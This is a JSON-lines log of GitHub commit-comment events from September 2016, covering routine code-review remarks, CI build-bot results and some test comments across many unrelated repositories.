{"id":"4537483560","type":"CommitCommentEvent","actor":{"login":"DoctorMcKay"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":18955725,"position":22,"line":306,"path":"components/confirmations.js","commit_id":"ce4d7ae026cd4bb978a350cd0db4b5d30f043442","created_at":"2016-09-09T00:36:13Z","updated_at":"2016-09-09T00:36:13Z","body":"No, the page itself is throttled. I was getting 429s in testing by requesting it every 5 seconds. This change was made because today's Steam maintenance exposed the offer ID directly in the page, making the extra request unnecessary."}},"created_at":"2016-09-09T00:36:13Z"}
{"id":"4537483689","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"greyblake/crystal-icr"},"payload":{"comment":{"id":18955727,"position":19,"line":37,"path":"src/icr/cli.cr","commit_id":"7cc3995fc516a0fb5e789d45e794025869167709","created_at":"2016-09-09T00:36:15Z","updated_at":"2016-09-09T00:36:15Z","body":"`\\n` instead of `;` might help with code readability\r\n```\r\nicr -r non -r existent -r libs -r are -r in -r one -r line\r\n```\r\n=>\r\n```cr\r\nrequire \"non\";require \"existent\";require \"libs\";require \"are\";require \"in\";require \"one\";require \"line\"\r\n```"}},"created_at":"2016-09-09T00:36:15Z"}
{"id":"4537483800","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18955728,"position":null,"line":null,"path":null,"commit_id":"de88f6a99d8546ace57ef63e9538e656fcf84ab2","created_at":"2016-09-09T00:36:17Z","updated_at":"2016-09-09T00:36:17Z","body":"iteration (Unknown) - x86_64-MacOS-10.10-clang: OK (2388 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-de88f6a99d8546ace57ef63e9538e656fcf84ab2-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T00:36:17Z"}
{"id":"4537484808","type":"CommitCommentEvent","actor":{"login":"andrenpaes"},"repo":{"name":"killbill/killbill-adyen-plugin"},"payload":{"comment":{"id":18955731,"position":null,"line":null,"path":null,"commit_id":"48baabf9c14557ea9ce1d7db4d946e8bdb9230fd","created_at":"2016-09-09T00:36:39Z","updated_at":"2016-09-09T00:36:39Z","body":"👍 "}},"created_at":"2016-09-09T00:36:39Z"}
{"id":"4537486836","type":"CommitCommentEvent","actor":{"login":"papachoco"},"repo":{"name":"NextThought/nti.schema"},"payload":{"comment":{"id":18955749,"position":null,"line":null,"path":null,"commit_id":"e8fc0d2ae152d23b00084e268f740b504f8112df","created_at":"2016-09-09T00:37:25Z","updated_at":"2016-09-09T00:37:25Z","body":"Looks pretty good... getattr and the loop sure can be slow"}},"created_at":"2016-09-09T00:37:25Z"}
{"id":"4537488092","type":"CommitCommentEvent","actor":{"login":"cdiamantopoulos"},"repo":{"name":"cdiamantopoulos/cdiamantopoulos.github.io"},"payload":{"comment":{"id":18955755,"position":null,"line":null,"path":null,"commit_id":"d6b54efc74f2d456c0c4279b29f1bc224b62cedd","created_at":"2016-09-09T00:37:52Z","updated_at":"2016-09-09T00:37:52Z","body":"first time committing?"}},"created_at":"2016-09-09T00:37:52Z"}
{"id":"4537494191","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18955797,"position":38,"line":83,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-09T00:40:03Z","updated_at":"2016-09-09T00:40:03Z","body":"As in you can reuse this function and not just for the album-view-song-item class. What if you want to find the parent for a different class?"}},"created_at":"2016-09-09T00:40:03Z"}
{"id":"4537495501","type":"CommitCommentEvent","actor":{"login":"Lagg"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":18955814,"position":22,"line":306,"path":"components/confirmations.js","commit_id":"ce4d7ae026cd4bb978a350cd0db4b5d30f043442","created_at":"2016-09-09T00:40:30Z","updated_at":"2016-09-09T00:40:30Z","body":"Okay, so at least I now know that the fix I wrote to consolidate this stuff into one big lazily-checked queue was a necessary one."}},"created_at":"2016-09-09T00:40:30Z"}
{"id":"4537496548","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18955830,"position":39,"line":84,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-09T00:40:51Z","updated_at":"2016-09-09T00:40:51Z","body":"not related which is why it's on a second line. Defensive coding is when you proactively check for and handle errors. Like doing null checks to make sure the element exists before trying to act on it. "}},"created_at":"2016-09-09T00:40:51Z"}
{"id":"4537496557","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18955831,"position":null,"line":null,"path":null,"commit_id":"60ec043fa884f3ac07005b0da8ee997babc4cb48","created_at":"2016-09-09T00:40:51Z","updated_at":"2016-09-09T00:40:51Z","body":"input_processor_refactor (pshires) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1209 of 1210 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.87%25-green.svg)</a>\n"}},"created_at":"2016-09-09T00:40:51Z"}
{"id":"4537497017","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18955833,"position":53,"line":98,"path":"scripts/album.js","commit_id":"28b01347c4f34ac2ea49a38c0e9b27867ebb3acd","created_at":"2016-09-09T00:41:00Z","updated_at":"2016-09-09T00:41:00Z","body":"not the same thing at all. "}},"created_at":"2016-09-09T00:41:00Z"}
{"id":"4537499187","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18955842,"position":null,"line":null,"path":null,"commit_id":"60ec043fa884f3ac07005b0da8ee997babc4cb48","created_at":"2016-09-09T00:41:44Z","updated_at":"2016-09-09T00:41:44Z","body":"input_processor_refactor (pshires) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-60ec043fa884f3ac07005b0da8ee997babc4cb48-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-09T00:41:44Z"}
{"id":"4537509436","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18955882,"position":43,"line":110,"path":"scripts/album.js","commit_id":"2b437e762dbebbc7570a841abe4e5d855877e737","created_at":"2016-09-09T00:45:26Z","updated_at":"2016-09-09T00:45:26Z","body":"this won't work properly due to the way you wrote findParentByClassName. This is an example of when your errors compound and make you bigger problems"}},"created_at":"2016-09-09T00:45:26Z"}
{"id":"4537513245","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18955893,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-09T00:46:52Z","updated_at":"2016-09-09T00:46:52Z","body":"ASIHPValidation (shenb) - Win64-Windows-7-VisualStudio-12: OK (2330 of 2332 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-09T00:46:52Z"}
{"id":"4537518054","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18955905,"position":null,"line":null,"path":null,"commit_id":"5aa37013d8fb1490f41b279d32515762d2c33028","created_at":"2016-09-09T00:48:37Z","updated_at":"2016-09-09T00:48:37Z","body":"👍 "}},"created_at":"2016-09-09T00:48:37Z"}
{"id":"4537518838","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-docs"},"payload":{"comment":{"id":18955909,"position":null,"line":null,"path":null,"commit_id":"0623a2a778e7a7f88c9ed8c20b326d7df2bb810d","created_at":"2016-09-09T00:48:55Z","updated_at":"2016-09-09T00:48:55Z","body":"👍 "}},"created_at":"2016-09-09T00:48:55Z"}
{"id":"4537521104","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18955917,"position":null,"line":null,"path":null,"commit_id":"00f84413e1499848b778cce575bed888f124a418","created_at":"2016-09-09T00:49:48Z","updated_at":"2016-09-09T00:49:48Z","body":"os_2.0_develop_signal_slot_bug (schrismartin) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T00:49:48Z"}
{"id":"4537521261","type":"CommitCommentEvent","actor":{"login":"kwk"},"repo":{"name":"almighty/almighty-jobs"},"payload":{"comment":{"id":18955918,"position":null,"line":null,"path":null,"commit_id":"c99ef8b87d81ff18b81a2dd7214f7cd20d71ea0b","created_at":"2016-09-09T00:49:52Z","updated_at":"2016-09-09T00:49:52Z","body":"LGTM thank you. Much cleaner than my solution. "}},"created_at":"2016-09-09T00:49:52Z"}
{"id":"4537526087","type":"CommitCommentEvent","actor":{"login":"sludtke42"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":18955937,"position":null,"line":null,"path":null,"commit_id":"45847324a66ac53bb0c71d8c2b2c73436315997c","created_at":"2016-09-09T00:51:40Z","updated_at":"2016-09-09T00:51:40Z","body":"?\n----------------------------------------------------------------------------\nSteven Ludtke, Ph.D.\nProfessor, Dept. of Biochemistry and Mol. Biol.                Those who do\nCo-Director National Center For Macromolecular Imaging\t           ARE\nBaylor College of Medicine                                     The converse\nsludtke@bcm.edu  -or-  stevel@alumni.caltech.edu               also applies\nhttp://ncmi.bcm.edu/~stevel\n\n> On Sep 8, 2016, at 5:21 PM, James Michael Bell <notifications@github.com> wrote:\n> \n> Good to know. I'll avoid committing permission modifications and related stuff in the future.\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub <https://github.com/cryoem/eman2/commit/45847324a66ac53bb0c71d8c2b2c73436315997c#commitcomment-18954108>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AJ6i6j22xWc-LcKj6g6vT_AyEpfYAsLwks5qoIpZgaJpZM4JiWk4>.\n> \n\n"}},"created_at":"2016-09-09T00:51:40Z"}
{"id":"4537526385","type":"CommitCommentEvent","actor":{"login":"SergeyZhukovsky"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18955940,"position":6,"line":860,"path":"Application/LinkBubble/src/main/java/com/linkbubble/Settings.java","commit_id":"dc5f1f2fc66bc33a73eb0cd0e0efa3e82631eab1","created_at":"2016-09-09T00:51:46Z","updated_at":"2016-09-09T00:51:46Z","body":"You are right, corrected it here\r\nhttps://github.com/brave/browser-android/commit/a360832bddd06019c3eeeecf5308130eb759be7f"}},"created_at":"2016-09-09T00:51:46Z"}
{"id":"4537538187","type":"CommitCommentEvent","actor":{"login":"crossan007"},"repo":{"name":"ChurchCRM/CRM"},"payload":{"comment":{"id":18956002,"position":19,"line":17,"path":"src/api/routes/persons.php","commit_id":"5f14cc8fd09e177a0673c586c297dbd3e1af45d7","created_at":"2016-09-09T00:55:51Z","updated_at":"2016-09-09T00:55:51Z","body":"I don't like this.\r\n\r\nI liked the previous method of returning the file directly as a result of the API call.\r\n\r\nthis method unnecessarily increases the number of GETs (and subsequent redirects) especially on a page with a lot of people icons!"}},"created_at":"2016-09-09T00:55:51Z"}
{"id":"4537540636","type":"CommitCommentEvent","actor":{"login":"RemeoJenius"},"repo":{"name":"li1191863273/math"},"payload":{"comment":{"id":18956017,"position":null,"line":null,"path":null,"commit_id":"0d4de6f2aa996fd7dc54de9cc77162c413b23982","created_at":"2016-09-09T00:56:43Z","updated_at":"2016-09-09T00:56:43Z","body":"这个 很棒"}},"created_at":"2016-09-09T00:56:43Z"}
{"id":"4537541018","type":"CommitCommentEvent","actor":{"login":"kaschioudi"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":18956019,"position":null,"line":null,"path":null,"commit_id":"32783698ba24556f34fbc5aa72f6850ba0ff0948","created_at":"2016-09-09T00:56:51Z","updated_at":"2016-09-09T00:56:51Z","body":"Done."}},"created_at":"2016-09-09T00:56:51Z"}
{"id":"4537542946","type":"CommitCommentEvent","actor":{"login":"tgies"},"repo":{"name":"hexchat/hexchat"},"payload":{"comment":{"id":18956023,"position":null,"line":null,"path":null,"commit_id":"ec12871e60796e5ce63303c5be8c75f146edfef8","created_at":"2016-09-09T00:57:34Z","updated_at":"2016-09-09T00:57:34Z","body":"Is there any reason to open the log file in binary mode as well? This is causing log files on Windows to have Unix line endings."}},"created_at":"2016-09-09T00:57:34Z"}
{"id":"4537544138","type":"CommitCommentEvent","actor":{"login":"Odoo0101"},"repo":{"name":"Odoo0101/kook"},"payload":{"comment":{"id":18956027,"position":null,"line":null,"path":null,"commit_id":"b8db687418a8ef928dc4302e2bc2e2362743027d","created_at":"2016-09-09T00:58:02Z","updated_at":"2016-09-09T00:58:02Z","body":"dffgggg"}},"created_at":"2016-09-09T00:58:02Z"}
{"id":"4537544276","type":"CommitCommentEvent","actor":{"login":"joshuadwire"},"repo":{"name":"joshuadwire/invoiceninja"},"payload":{"comment":{"id":18956028,"position":null,"line":null,"path":null,"commit_id":"ed07439de2546728e9d9fd9f67411d4281c20021","created_at":"2016-09-09T00:58:05Z","updated_at":"2016-09-09T00:58:05Z","body":"@hillelcoren I think GoCardless supports only Bank Transfers rather than Credit Card payments, so I've added this so that GoCardless still shows up when a Credit Card gateway has been configured."}},"created_at":"2016-09-09T00:58:05Z"}
{"id":"4537547343","type":"CommitCommentEvent","actor":{"login":"bigdogmat"},"repo":{"name":"wiremod/wire"},"payload":{"comment":{"id":18956036,"position":null,"line":null,"path":null,"commit_id":"8416c3ef736264e434c20a918c3c1b31aae0adfd","created_at":"2016-09-09T00:59:12Z","updated_at":"2016-09-09T00:59:12Z","body":"@Divran Guessing your branch was outdated considering you removed the not equal to operator"}},"created_at":"2016-09-09T00:59:12Z"}
{"id":"4537548713","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18956037,"position":26,"line":332,"path":"src/map/enmity_container.cpp","commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T00:59:42Z","updated_at":"2016-09-09T00:59:42Z","body":"isn't this updating the hipclvl of the thing the mob is attacking?"}},"created_at":"2016-09-09T00:59:42Z"}
{"id":"4537550552","type":"CommitCommentEvent","actor":{"login":"leiwang008"},"repo":{"name":"SAFSDEV/build"},"payload":{"comment":{"id":18956042,"position":null,"line":null,"path":null,"commit_id":"425f29ff5599d6c1633baf0844e474c2d4891473","created_at":"2016-09-09T01:00:19Z","updated_at":"2016-09-09T01:00:19Z","body":"Normally, we don't need this environment. During GIT installation, the GIT installer has already modified the PATH so that \"git\" command could be invoked.\r\nFor this script, I want to use the command \"curl\" provided by GIT and it is in the folder \"usr/bin\", but it has not been added into the PATH during GIT installation. So I need this GIT_HOME environment to get \"curl\".\r\nIn brief, GIT_HOME is ONLY needed for this script."}},"created_at":"2016-09-09T01:00:19Z"}
{"id":"4537552467","type":"CommitCommentEvent","actor":{"login":"distributev"},"repo":{"name":"distributev/the-app"},"payload":{"comment":{"id":18956046,"position":null,"line":null,"path":null,"commit_id":"9683a587e28f96f470a304f3c8edc5a466422374","created_at":"2016-09-09T01:00:52Z","updated_at":"2016-09-09T01:00:52Z","body":"This is only fixing the /client part (client/components/mail-merge/mail-merge.js)\r\n\r\nWhat about the /server interpolation of 'html_permalink',  'pdf_permalink' and 'zip_permalink'?"}},"created_at":"2016-09-09T01:00:52Z"}
{"id":"4537553246","type":"CommitCommentEvent","actor":{"login":"rmacion"},"repo":{"name":"rmacion/sample"},"payload":{"comment":{"id":18956052,"position":5,"line":14,"path":"index.html","commit_id":"a988cd70622cc86f8b2c75e5ac8f6a71d454ee62","created_at":"2016-09-09T01:01:08Z","updated_at":"2016-09-09T01:01:08Z","body":"macionrandmc"}},"created_at":"2016-09-09T01:01:08Z"}
{"id":"4537553416","type":"CommitCommentEvent","actor":{"login":"teschnei"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18956054,"position":null,"line":null,"path":null,"commit_id":"9dfcfe81110648161481af1d29ded3d736c77301","created_at":"2016-09-09T01:01:11Z","updated_at":"2016-09-09T01:01:11Z","body":"there are redundant hipclvl writes now (TakePhysicalDamage, for one).\r\n\r\nhowever, this will change will not write hipclvl for offensive actions that don't deal damage (debuffs, basically), so we will need to fix that as well"}},"created_at":"2016-09-09T01:01:11Z"}
{"id":"4537557590","type":"CommitCommentEvent","actor":{"login":"jonjamcam"},"repo":{"name":"jonjamcam/JamTaba"},"payload":{"comment":{"id":18956061,"position":null,"line":null,"path":null,"commit_id":"b598e57319ee3784732a97af20266056421c3785","created_at":"2016-09-09T01:02:31Z","updated_at":"2016-09-09T01:02:31Z","body":"just a test"}},"created_at":"2016-09-09T01:02:31Z"}
{"id":"4537559954","type":"CommitCommentEvent","actor":{"login":"nathansherburn"},"repo":{"name":"SLC3/MARS"},"payload":{"comment":{"id":18956069,"position":null,"line":null,"path":null,"commit_id":"0e25c42b0c5bef2de279b35718f695a64618c264","created_at":"2016-09-09T01:03:24Z","updated_at":"2016-09-09T01:03:24Z","body":"closes #97 "}},"created_at":"2016-09-09T01:03:24Z"}
{"id":"4537563382","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18956073,"position":null,"line":null,"path":null,"commit_id":"a360832bddd06019c3eeeecf5308130eb759be7f","created_at":"2016-09-09T01:04:39Z","updated_at":"2016-09-09T01:04:39Z","body":"do you want to match google.com in this case? In which case it wouldn't match because you are looking for .google.com"}},"created_at":"2016-09-09T01:04:39Z"}
{"id":"4537568271","type":"CommitCommentEvent","actor":{"login":"rich-reactor8"},"repo":{"name":"dtk/dtk-server"},"payload":{"comment":{"id":18956083,"position":6,"line":41,"path":"application/model/module_refs/tree.rb","commit_id":"6c08c3330bd34650c0c5594eedc9fa6a00fe3ecf","created_at":"2016-09-09T01:06:24Z","updated_at":"2016-09-09T01:06:24Z","body":"Aldin,\r\nThanks for context. That explained everything"}},"created_at":"2016-09-09T01:06:24Z"}
{"id":"4537572491","type":"CommitCommentEvent","actor":{"login":"javelinjs"},"repo":{"name":"dmlc/mxnet"},"payload":{"comment":{"id":18956094,"position":4,"line":111,"path":"tests/travis/run_test.sh","commit_id":"3e15f6288609419e7bf5aa3119b1212eaeeec8be","created_at":"2016-09-09T01:07:49Z","updated_at":"2016-09-09T01:07:49Z","body":"@pluskid Really sorry. Thanks kid!"}},"created_at":"2016-09-09T01:07:49Z"}
{"id":"4537574918","type":"CommitCommentEvent","actor":{"login":"bwangel23"},"repo":{"name":"bwangel23/canvas"},"payload":{"comment":{"id":18956100,"position":21,"line":43,"path":"show-music/public/javascripts/index.js","commit_id":"90f34c8a7e164aa2fb7e7d7a2693bd0d580293ef","created_at":"2016-09-09T01:08:40Z","updated_at":"2016-09-09T01:08:40Z","body":"clientHeight和clientWidth分别代表了元素的内部宽度和高度。\r\n\r\nhttps://developer.mozilla.org/en-US/docs/Web/API/Element/clientHeight"}},"created_at":"2016-09-09T01:08:40Z"}
{"id":"4537577929","type":"CommitCommentEvent","actor":{"login":"Odoo0101"},"repo":{"name":"Odoo0101/hello-people"},"payload":{"comment":{"id":18956103,"position":1,"line":1,"path":"README.md","commit_id":"21b265098a97641fba36043f2e3fe188b55ed239","created_at":"2016-09-09T01:09:46Z","updated_at":"2016-09-09T01:09:46Z","body":"xnnxnxnxnxnnxnxnx"}},"created_at":"2016-09-09T01:09:46Z"}
{"id":"4537578409","type":"CommitCommentEvent","actor":{"login":"Odoo0101"},"repo":{"name":"Odoo0101/hello-people"},"payload":{"comment":{"id":18956104,"position":null,"line":null,"path":null,"commit_id":"21b265098a97641fba36043f2e3fe188b55ed239","created_at":"2016-09-09T01:09:57Z","updated_at":"2016-09-09T01:09:57Z","body":"ahhahhahah"}},"created_at":"2016-09-09T01:09:57Z"}
{"id":"4537578781","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18956105,"position":null,"line":null,"path":null,"commit_id":"00f84413e1499848b778cce575bed888f124a418","created_at":"2016-09-09T01:10:05Z","updated_at":"2016-09-09T01:10:05Z","body":"os_2.0_develop_signal_slot_bug (schrismartin) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-09T01:10:05Z"}
{"id":"4537586156","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956134,"position":11,"line":11,"path":"Tetris/GameController.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:12:46Z","updated_at":"2016-09-09T01:12:46Z","body":"Está bueno llevar los estados en un enum. Para el -1 podría llamase INVALID or END."}},"created_at":"2016-09-09T01:12:46Z"}
{"id":"4537586180","type":"CommitCommentEvent","actor":{"login":"jwittner"},"repo":{"name":"Microsoft/HoloToolkit-Unity"},"payload":{"comment":{"id":18956135,"position":null,"line":null,"path":null,"commit_id":"4d8fd9213fee9934e5b439f81c340b418ff0da72","created_at":"2016-09-09T01:12:46Z","updated_at":"2016-09-09T01:12:46Z","body":"I'm a little unclear on what you're trying to achieve, but I think for most Tag-a-long style things this should work. For reference, the new FPS display prefab is an example of a tag along that uses this Billboard class as is and pivots around the Y-axis.\r\n\r\n"}},"created_at":"2016-09-09T01:12:46Z"}
{"id":"4537586482","type":"CommitCommentEvent","actor":{"login":"nguyenvanduocit"},"repo":{"name":"senviet/twenty-fifteen-vue"},"payload":{"comment":{"id":18956139,"position":4,"line":3,"path":"src/vuex/menu/actions.js","commit_id":"a2186e8b898d71547ff14955d9b1415ff926dd41","created_at":"2016-09-09T01:12:53Z","updated_at":"2016-09-09T01:12:53Z","body":"Có thể gộp các hai request lại làm một. Vì suy cho cùng, hai menu, chứ thực ra cũng là một module: menu"}},"created_at":"2016-09-09T01:12:53Z"}
{"id":"4537587464","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956146,"position":10,"line":10,"path":"Tetris/GameController.h","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:13:14Z","updated_at":"2016-09-09T01:13:14Z","body":"Poné el destructor como virtual."}},"created_at":"2016-09-09T01:13:14Z"}
{"id":"4537587824","type":"CommitCommentEvent","actor":{"login":"Stebalien"},"repo":{"name":"hellerbarde/stapler"},"payload":{"comment":{"id":18956147,"position":null,"line":null,"path":null,"commit_id":"1eb0ca6ec99fc5f3e39342109b18f098d3ffe17d","created_at":"2016-09-09T01:13:22Z","updated_at":"2016-09-09T01:13:22Z","body":"OK. So does Fedora revert that commit? Is that what you mean by \"puts back in\"? Or is Fedora using an old version?\r\n\r\nMost importantly: What exactly are you trying to do? I'm trying to get a handle on what's actionable here."}},"created_at":"2016-09-09T01:13:22Z"}
{"id":"4537591788","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956160,"position":11,"line":11,"path":"Tetris/GameController.cpp","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:14:50Z","updated_at":"2016-09-09T01:14:50Z","body":"ah! vi mas abajo que tenés un enum para eso. Fijate que lo tenés privado. El tema es así, si vas a utilizar una función pública que toma un parámetro de estado, sería mejor poner la enum pública tambien."}},"created_at":"2016-09-09T01:14:50Z"}
{"id":"4537593812","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956166,"position":19,"line":19,"path":"Tetris/GameController.h","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:15:36Z","updated_at":"2016-09-09T01:15:36Z","body":"Usá el enum acá también."}},"created_at":"2016-09-09T01:15:36Z"}
{"id":"4537593960","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18956168,"position":null,"line":null,"path":null,"commit_id":"00f84413e1499848b778cce575bed888f124a418","created_at":"2016-09-09T01:15:39Z","updated_at":"2016-09-09T01:15:39Z","body":"os_2.0_develop_signal_slot_bug (schrismartin) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-00f84413e1499848b778cce575bed888f124a418-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-09T01:15:39Z"}
{"id":"4537599077","type":"CommitCommentEvent","actor":{"login":"SamiBoy2001"},"repo":{"name":"SamiBoy2001/Caps"},"payload":{"comment":{"id":18956181,"position":null,"line":null,"path":null,"commit_id":"de8591a871eee46bbf1f0b6c7df1f6ae4b212ce6","created_at":"2016-09-09T01:17:34Z","updated_at":"2016-09-09T01:17:34Z","body":"Trying to Rpub."}},"created_at":"2016-09-09T01:17:34Z"}
{"id":"4537599320","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"matias09/tetris"},"payload":{"comment":{"id":18956182,"position":7,"line":7,"path":"Tetris/GameFlow.h","commit_id":"fe0b49a11a9347278709dc77154a4f6759e01fcb","created_at":"2016-09-09T01:17:40Z","updated_at":"2016-09-09T01:17:40Z","body":"Estó que ponés acá  (class GameController;) se llama forward declaration. Está muy bien y se utiliza un montón! Promueve buenas prácticas. Sin embargo, si lo ponés, deberías sacar la línea 5, y ponerla en el GameFlow.cpp. Hagamos eso! Dejemos la Forwar declaration y mandemos el include al cpp."}},"created_at":"2016-09-09T01:17:40Z"}
{"id":"4537603317","type":"CommitCommentEvent","actor":{"login":"Mr-Cotton"},"repo":{"name":"Mr-Cotton/calculator-rspec"},"payload":{"comment":{"id":18956191,"position":null,"line":null,"path":null,"commit_id":"757d7d3479ab0e54c87034795a999b58ecdb3a63","created_at":"2016-09-09T01:19:13Z","updated_at":"2016-09-09T01:19:13Z","body":"Wait no I messed up on line 14... it should be written as just num 2 == 0 num1 should be deleted since 0 / x = 0 "}},"created_at":"2016-09-09T01:19:13Z"}
